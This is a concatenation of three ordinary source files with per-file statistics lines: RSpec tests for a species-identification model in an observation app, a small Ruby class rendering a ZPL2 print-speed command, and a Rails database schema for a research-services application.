expect( o.num_identification_agreements ).to eq 0
end
it "should decrement the observations num_identification_disagreements if this was a disagreement" do
o = Observation.make!( taxon: Taxon.make! )
ident = Identification.make!( observation: o )
o.reload
expect( o.num_identification_disagreements ).to be >= 1
num_identification_disagreements = o.num_identification_disagreements
ident.destroy
o.reload
expect( o.num_identification_disagreements ).to eq num_identification_disagreements - 1
end
it "should decremement the counter cache in users for an ident on someone else's observation" do
i = Identification.make!
expect( i.user ).not_to be i.observation.user
old_count = i.user.identifications_count
user = i.user
i.destroy
user.reload
expect( user.identifications_count ).to eq 0
end
it "should NOT decremement the counter cache in users for an ident on one's OWN observation" do
new_observation = Observation.make!( taxon: Taxon.make! )
new_observation.reload
owners_ident = new_observation.identifications.select do |ident|
ident.user_id == new_observation.user_id
end.first
user = new_observation.user
old_count = user.identifications_count
owners_ident.destroy
user.reload
expect(user.identifications_count).to eq old_count
end
it "should update observation quality_grade" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.last.destroy
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should update observation quality_grade if made by another user" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should not queue a job to update project lists if owners ident" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.owners_identification.destroy
Delayed::Job.delete_all
Identification.make!(:user => o.user, :observation => o, :taxon => Taxon.make!)
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /ProjectList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if changed from research grade" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.identifications.by(o.user).first.destroy
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if research grade" do
o = make_research_grade_observation
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
stamp = Time.now
Delayed::Job.delete_all
Identification.make!(:taxon => o.taxon, :observation => o)
o.reload
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should nilify curator_identification_id on project observations if no other current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i)
po.reload
expect(po.curator_identification).not_to be_blank
expect(po.curator_identification_id).to eq i.id
i.destroy
po.reload
expect(po.curator_identification_id).to be_blank
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i1)
i2 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i2)
po.reload
expect(po.curator_identification_id).to eq i2.id
i2.destroy
Identification.run_revisit_curator_identification(o.id, i2.user_id)
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the user's last identification as current" do
ident1 = Identification.make!
ident2 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident3 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident2.reload
expect(ident2).not_to be_current
ident3.destroy
ident2.reload
expect(ident2).to be_current
ident1.reload
expect(ident1).not_to be_current
end
it "should set observation taxon to that of last current ident for owner" do
o = Observation.make!(:taxon => Taxon.make!)
ident1 = o.owners_identification
ident2 = Identification.make!(:observation => o, :user => o.user)
ident3 = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(o.taxon_id).to eq(ident3.taxon_id)
ident3.destroy
o.reload
expect(o.taxon_id).to eq(ident2.taxon_id)
end
it "should set the observation's community taxon if remaining identifications" do
load_test_taxa
o = Observation.make!(:taxon => @Calypte_anna)
expect(o.community_taxon).to be_blank
i1 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i3 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i2 = Identification.make!(:observation => o, :taxon => @Pseudacris_regilla)
o.reload
expect(o.community_taxon).to eq(@Calypte_anna)
i1.destroy
o.reload
expect(o.community_taxon).to eq(@Chordata) # consensus
end
it "should remove the observation's community taxon if no more identifications" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
o.reload
expect( o.community_taxon ).to eq o.taxon
i.destroy
o.reload
expect( o.community_taxon ).to be_blank
end
it "should remove the observation.taxon if there are no more identifications" do
o = Observation.make!
i = Identification.make!( observation: o )
expect( o.taxon ).to eq i.taxon
i.destroy
o.reload
expect( o.taxon ).to be_blank
end
it "destroys automatically created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 0
end
it "does not destroy user created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
o.observation_reviews.destroy_all
r = ObservationReview.make!(observation: o, user: o.user, user_added: true)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 1
end
end
describe Identification, "captive" do
elastic_models( Observation, Identification )
it "should vote yes on the wild quality metric if 1" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
expect(o.quality_metrics.first.user).to eq(i.user)
expect(o.quality_metrics.first).not_to be_agree
end
it "should vote no on the wild quality metric if 0 and metric exists" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
i.update_attributes(:captive_flag => "0")
o.reload
expect(o.quality_metrics.first).not_to be_agree
end
it "should not alter quality metrics if nil" do
i = Identification.make!(:captive_flag => nil)
o = i.observation
expect(o.quality_metrics).to be_blank
end
it "should not alter quality metrics if 0 and not metrics exist" do
i = Identification.make!(:captive_flag => "0")
o = i.observation
expect(o.quality_metrics).to be_blank
end
end
describe Identification do
elastic_models( Observation, Identification )
it { is_expected.to belong_to :user }
it { is_expected.to belong_to :taxon_change }
it { is_expected.to belong_to(:previous_observation_taxon).class_name "Taxon" }
it { is_expected.to have_many(:project_observations).with_foreign_key(:curator_identification_id).dependent :nullify }
it { is_expected.to validate_presence_of :observation }
it { is_expected.to validate_presence_of :user }
it { is_expected.to validate_presence_of(:taxon).with_message "for an ID must be something we recognize" }
it { is_expected.to validate_length_of(:body).is_at_least(0).is_at_most(Comment::MAX_LENGTH).allow_blank.on :create }
describe "mentions" do
before { enable_has_subscribers }
after { disable_has_subscribers }
it "knows what users have been mentioned" do
u = User.make!
i = Identification.make!(body: "hey @#{ u.login }")
expect( i.mentioned_users ).to eq [ u ]
end
it "generates mention updates" do
u = User.make!
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq false
i = Identification.make!(body: "hey @#{ u.login }")
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq true
end
end
describe "run_update_curator_identification" do
it "indexes the observation in elasticsearch" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(user: o.user, project: p)
po = ProjectObservation.make!(observation: o, project: p)
i = Identification.make!(user: p.user, observation: o)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 0
Identification.run_update_curator_identification(i)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 1
end
end
end
describe Identification, "category" do
let( :o ) { Observation.make! }
let(:parent) { Taxon.make!( rank: Taxon::GENUS ) }
let(:child) { Taxon.make!( rank: Taxon::SPECIES, parent: parent ) }
describe "should be improving when" do
it "is the first that matches the community ID among several IDs" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
o.reload
i1.reload
expect( o.community_taxon ).to eq i1.taxon
expect( i1.observation.identifications.count ).to eq 2
expect( i1.category ).to eq Identification::IMPROVING
end
it "qualifies but isn't current" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
i3 = Identification.make!( observation: o, taxon: child, user: i1.user )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
it "is an ancestor of the community taxon and was not added after the first ID of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
i4 = Identification.make!( observation: o, taxon: child )
o.reload
expect( o.community_taxon ).to eq child
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
end
describe "should be maverick when" do
it "the community taxon is not an ancestor" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
i3 = Identification.make!( observation: o )
i3.reload
expect( i3.category ).to eq Identification::MAVERICK
end
end
describe "should be leading when" do
it "is the only ID" do
i = Identification.make!
expect( i.category ).to eq Identification::LEADING
end
it "has a taxon that is a descendant of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: parent )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::LEADING
end
end
describe "should be supporting when" do
it "matches the community taxon but is not the first to do so" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
expect( i2.category ).to eq Identification::SUPPORTING
end
it "descends from the community taxon but is not the first identification of that taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::SUPPORTING
end
end
describe "examples: " do
describe "sequence of IDs along the same ancestry" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Chordata ),
Identification.make!( observation: o, taxon: @Aves ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte_anna )
]
@sequence.each(&:reload)
@sequence
end
it "should all be improving until the community taxon" do
o.reload
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
it "should be improving when it's the first to match the community ID" do
expect( @sequence[2].category ).to eq Identification::IMPROVING
end
it "should end with a leading ID" do
expect( @sequence.last.category ).to eq Identification::LEADING
end
it "should continue to have improving IDs even if the first identifier agrees with the last" do
first = @sequence[0]
i = Identification.make!( observation: o, taxon: @sequence[-1].taxon, user: first.user )
first.reload
@sequence[1].reload
expect( first ).not_to be_current
expect( first.category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
end
end
describe "after withdrawing and restoring" do
before do
load_test_taxa
u1 = o.user
u2 = User.make!
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u2 ),
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
]
@sequence.each(&:reload)
o.reload
@sequence
end
it "should not change" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[2].category ).to eq Identification::SUPPORTING
@sequence[2].update_attributes( current: false )
expect( @sequence[2] ).not_to be_current
@sequence[2].update_attributes( current: true )
@sequence[2].reload
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "conservative disagreement" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should consider disagreements that match the community taxon to be improving" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[1].category ).to eq Identification::IMPROVING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
# it "should consider the identification people disagreed with to be maverick" do
# expect( @sequence[0].category ).to eq Identification::MAVERICK
# end
end
describe "single user redundant identifications" do
before do
load_test_taxa
user = User.make!
@sequence = [
Identification.make!( observation: o, user: user, taxon: @Calypte ),
Identification.make!( observation: o, user: user, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should leave the current ID as leading" do
expect( @sequence.last ).to be_current
expect( @sequence.last.category ).to eq Identification::LEADING
end
end
describe "disagreement within a genus" do
before do
load_test_taxa
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should have all leading IDs" do
expect( @sequence[0].category ).to eq Identification::LEADING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::LEADING
end
end
describe "disagreement with revision" do
before do
load_test_taxa
user = User.make!
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should be improving, leading, supporting" do
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "after taxon swap" do
let(:swap) { make_taxon_swap }
let(:o) { make_research_grade_observation( taxon: swap.input_taxon ) }
it "should be improving, supporting for acitve IDs" do
expect( o.identifications.sort_by(&:id)[0].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[1].category ).to eq Identification::SUPPORTING
swap.committer = swap.user
swap.commit
Delayed::Worker.new.work_off
o.reload
expect( o.identifications.sort_by(&:id)[2].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[3].category ).to eq Identification::SUPPORTING
end
end
describe "indexing" do
it "should happen for other idents after new one added" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
es_i1 = Identification.elastic_search( where: { id: i1.id } ).results.results[0]
expect( es_i1.category ).to eq Identification::IMPROVING
end
it "should update this identification's category" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
i2.reload
expect( i1.category ).to eq Identification::IMPROVING
expect( i2.category ).to eq Identification::SUPPORTING
Delayed::Worker.new.work_off
es_i2 = Identification.elastic_search( where: { id: i2.id } ).results.results[0]
expect( es_i2.category ).to eq Identification::SUPPORTING
end
end
end
describe Identification, "disagreement" do
elastic_models( Observation )
before { load_test_taxa } # Not sure why but these don't seem to pass if I do before(:all)
it "should be nil by default" do
expect( Identification.make! ).not_to be_disagreement
end
it "should automatically set to true on create if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_observation( taxon: @Calypte_anna)
2.times { Identification.make!( observation: o, taxon: o.taxon ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
i.reload
expect( i ).to be_disagreement
end
it "should not be automatically set to true on update if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_candidate_observation
i = Identification.make!( observation: o, taxon: @Calypte_anna )
4.times { Identification.make!( observation: o, taxon: @Pseudacris_regilla ) }
i.reload
expect( i ).not_to be_disagreement
end
it "should not be automatically set to true if no other identifications are current" do
o = Identification.make!( current: false ).observation
Identification.make!( observation: o, taxon: @Calypte_anna )
o.identifications.each { |i| i.update( current: false ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i ).not_to be_disagreement
end
describe "implicit disagreement" do
it "should set disagreement to true" do
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i.disagreement ).to eq true
end
it "should not set disagreement previous obs taxon was ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: s1 )
Identification.make!( observation: o, taxon: s1 )
i = Identification.make( observation: o, taxon: @Calypte_anna )
i.save!
expect( i.disagreement ).to be_nil
end
it "should not set disagreement if ident taxon is ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: s1 )
expect( i.disagreement ).to be_nil
end
end
end
describe Identification, "set_previous_observation_taxon" do
elastic_models( Observation )
it "should choose the observation taxon by default" do
o = Observation.make!( taxon: Taxon.make!(:species) )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should choose the probable taxon if the observer has opted out of the community taxon" do
o = Observation.make!( taxon: Taxon.make!(:species), prefers_community_taxon: false )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_probable_taxon = o.probable_taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_probable_taxon
end
it "should set it to the observer's previous identicication taxon if they are the only identifier" do
genus = Taxon.make!( rank: Taxon::GENUS )
species = Taxon.make!( rank: Taxon::SPECIES, parent: genus )
o = Observation.make!( taxon: species )
i1 = o.identifications.first
o.reload
expect( i1 ).to be_persisted
i2 = Identification.make!( observation: o, taxon: genus, user: i1.user )
expect( i2.previous_observation_taxon ).to eq i1.taxon
end
it "should not consider set a previous_observation_taxon to the identification taxon" do
family = Taxon.make!( rank: Taxon::FAMILY )
genus = Taxon.make!( rank: Taxon::GENUS, parent: family, name: "Homo" )
species = Taxon.make!(:species, parent: genus, name: "Homo sapiens" )
o = Observation.make!
i1 = Identification.make!( observation: o, taxon: genus )
i2 = Identification.make!( observation: o, taxon: species )
o.reload
expect( o.probable_taxon ).to eq species
o.reload
i3 = Identification.make!( observation: o, taxon: genus, user: i2.user, disagreement: true )
expect( i3.previous_observation_taxon ).to eq species
end
it "should not happen when you restore a withdrawn ident" do
genus = Taxon.make!( rank: Taxon::GENUS, name: "Genus" )
species1 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciesone" )
species2 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciestwo" )
o = Observation.make!( taxon: species1 )
i = Identification.make!( observation: o, taxon: genus, disagreement: true )
expect( i.previous_observation_taxon ).to eq species1
expect( o.taxon ).to eq genus
i.update_attributes( current: false )
o.reload
expect( o.taxon ).to eq species1
i2 = Identification.make!( observation: o, user: o.user, taxon: species2 )
expect( o.taxon ).to eq species2
i.update_attributes( current: true )
expect( i.previous_observation_taxon ).to eq species1
end
end
describe Identification, "update_disagreement_identifications_for_taxon" do
elastic_models( Observation )
let(:f) { Taxon.make!( rank: Taxon::FAMILY ) }
let(:g1) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:g2) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:s1) { Taxon.make!( rank: Taxon::SPECIES, parent: g1 ) }
describe "should set disagreement to false" do
it "when identification taxon becomes a descendant of the previous observation taxon" do
t = Taxon.make!( rank: Taxon::SPECIES, parent: g2 )
o = Observation.make!( taxon: g1 )
i = Identification.make!( taxon: t, observation: o )
expect( i.previous_observation_taxon ).to eq g1
expect( i ).to be_disagreement
without_delay { t.update_attributes( parent: g1 ) }
i.reload
expect( i ).not_to be_disagreement
end
it "when previous observation taxon becomes an ancestor of the identification taxon" do
t = Taxon.make!( rank: Taxon::GENUS, parent: f )
o = Observation.make!( taxon: t )
i = Identification.make!( taxon: s1, observation: o )
expect( i.previous_observation_taxon ).to eq t
expect( i ).to be_disagreement
without_delay { s1.update_attributes( parent: t ) }
i.reload
expect( i ).not_to be_disagreement
end
end
end
| 40.854436 | 144 | 0.689598 |
ab3fa666195f373826ad49989cd491c0558517b1 | 369 | module Languages
class Zpl2
class Speed
def initialize(amount)
set(amount)
end
def render
"^PR#{@amount},D,A"
end
private
def set(amount)
@amount = case(amount)
when :slow
'1'
when :normal
'A'
when :fast
'C'
end
end
end
end
end
| 14.76 | 30 | 0.449864 |
91c36db7e04678d3498b6cca598445c0fb189b52 | 43,965 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_05_18_200713) do
create_table "admin_rates", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "line_item_id"
t.integer "admin_cost"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "affiliations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_affiliations_on_protocol_id"
end
create_table "alerts", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "alert_type"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "approvals", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "identity_id"
t.datetime "approval_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "approval_type", default: "Resource Approval"
t.bigint "sub_service_request_id"
t.index ["identity_id"], name: "index_approvals_on_identity_id"
t.index ["service_request_id"], name: "index_approvals_on_service_request_id"
t.index ["sub_service_request_id"], name: "index_approvals_on_sub_service_request_id"
end
create_table "arms", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.integer "visit_count", default: 1
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "subject_count", default: 1
t.bigint "protocol_id"
t.boolean "new_with_draft", default: false
t.integer "minimum_visit_count", default: 0
t.integer "minimum_subject_count", default: 0
t.index ["protocol_id"], name: "index_arms_on_protocol_id"
end
create_table "associated_surveys", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "associable_id"
t.string "associable_type"
t.bigint "survey_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["associable_id"], name: "index_associated_surveys_on_associable_id"
t.index ["survey_id"], name: "index_associated_surveys_on_survey_id"
end
create_table "audits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "auditable_id"
t.string "auditable_type"
t.bigint "associated_id"
t.string "associated_type"
t.bigint "user_id"
t.string "user_type"
t.string "username"
t.string "action"
t.text "audited_changes"
t.integer "version", default: 0
t.string "comment"
t.string "remote_address"
t.datetime "created_at"
t.string "request_uuid"
t.index ["associated_id", "associated_type"], name: "associated_index"
t.index ["auditable_id", "auditable_type"], name: "auditable_index"
t.index ["created_at"], name: "index_audits_on_created_at"
t.index ["request_uuid"], name: "index_audits_on_request_uuid"
t.index ["user_id", "user_type"], name: "user_index"
end
create_table "available_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "selected", default: false
t.index ["organization_id"], name: "index_available_statuses_on_organization_id"
end
create_table "catalog_managers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "edit_historic_data"
t.index ["identity_id"], name: "index_catalog_managers_on_identity_id"
t.index ["organization_id"], name: "index_catalog_managers_on_organization_id"
end
create_table "charges", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "service_id"
t.decimal "charge_amount", precision: 12, scale: 4
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["service_id"], name: "index_charges_on_service_id"
t.index ["service_request_id"], name: "index_charges_on_service_request_id"
end
create_table "clinical_providers", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["identity_id"], name: "index_clinical_providers_on_identity_id"
t.index ["organization_id"], name: "index_clinical_providers_on_organization_id"
end
create_table "cover_letters", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "content"
t.bigint "sub_service_request_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["sub_service_request_id"], name: "index_cover_letters_on_sub_service_request_id"
end
create_table "delayed_jobs", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "priority", default: 0, null: false
t.integer "attempts", default: 0, null: false
t.text "handler", limit: 4294967295, null: false
t.text "last_error", limit: 4294967295
t.datetime "run_at"
t.datetime "locked_at"
t.datetime "failed_at"
t.string "locked_by"
t.string "queue"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["priority", "run_at"], name: "delayed_jobs_priority"
end
create_table "documents", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.datetime "deleted_at"
t.string "doc_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "document_file_name"
t.string "document_content_type"
t.integer "document_file_size"
t.datetime "document_updated_at"
t.string "doc_type_other"
t.bigint "protocol_id"
t.index ["protocol_id"], name: "index_documents_on_protocol_id"
end
create_table "documents_sub_service_requests", id: false, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "document_id"
t.bigint "sub_service_request_id"
end
create_table "editable_statuses", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "status", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.boolean "selected", default: false
t.index ["organization_id"], name: "index_editable_statuses_on_organization_id"
end
create_table "epic_queue_records", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "status"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "origin"
t.bigint "identity_id"
end
create_table "epic_queues", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.bigint "identity_id"
t.boolean "attempted_push", default: false
t.boolean "user_change", default: false
end
create_table "epic_rights", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "project_role_id"
t.string "right"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "excluded_funding_sources", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "subsidy_map_id"
t.string "funding_source"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["subsidy_map_id"], name: "index_excluded_funding_sources_on_subsidy_map_id"
end
create_table "feedbacks", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.text "message"
t.string "name"
t.string "email"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "fulfillment_synchronizations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8", force: :cascade do |t|
t.bigint "sub_service_request_id"
t.integer "line_item_id"
t.string "action"
t.boolean "synched", default: false
t.index ["sub_service_request_id"], name: "index_fulfillment_synchronizations_on_sub_service_request_id"
end
create_table "fulfillments", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "line_item_id"
t.string "timeframe"
t.string "time"
t.datetime "date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.string "unit_type"
t.string "quantity_type"
t.integer "quantity"
t.integer "unit_quantity"
t.index ["line_item_id"], name: "index_fulfillments_on_line_item_id"
end
